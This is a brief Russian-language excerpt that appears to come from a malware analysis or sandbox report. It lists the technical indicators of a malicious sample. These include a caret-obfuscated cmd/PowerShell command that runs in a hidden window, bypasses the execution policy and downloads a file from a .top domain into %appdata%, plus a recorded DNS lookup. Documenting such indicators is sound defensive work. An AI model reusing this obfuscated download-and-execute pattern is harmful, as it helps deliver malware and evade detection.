Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^e^RSHeL^L.ExE ^-eXE^cuTiOnP^ol^iC^Y BYpA^sS -nOPROfi^LE^ -wi^N^dOW^STyLe h^IDD^e^n (^n^e^w-o^bj^ECT s^ystEM^.^neT.^we^Bc^Li^En^t^).DoWN^L^oADFilE('http://www.doorasop...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PoW^e^RSHeL^L.ExE ^-eXE^cuTiOnP^ol^iC^Y BYpA^sS -nOPROfi^LE^ -wi^N^dOW^STyLe h^IDD^e^n (^n^e^w-o^bj^ECT s^ystEM^.^neT.^we^Bc^Li^En^t^).DoWN^L^oADFilE('http://www.doorasop...' (со скрытым окном)